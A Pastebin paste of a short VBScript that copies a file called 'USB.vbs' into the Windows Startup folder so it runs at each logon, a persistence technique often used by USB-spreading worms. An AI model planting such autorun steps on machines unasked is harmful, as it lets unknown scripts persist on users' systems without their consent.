Advertisement
Najeebsk

STARTUP-FOLDER-COPY.vbs

Dec 10th, 2021
296
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Option Explicit
  2. Dim fso, obj
  3. Set fso = CreateObject("Scripting.FileSystemObject")
  4. Set obj = CreateObject("wscript.shell")
  5. fso.CopyFile "USB.vbs" , obj.SpecialFolders("Startup")& "\"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement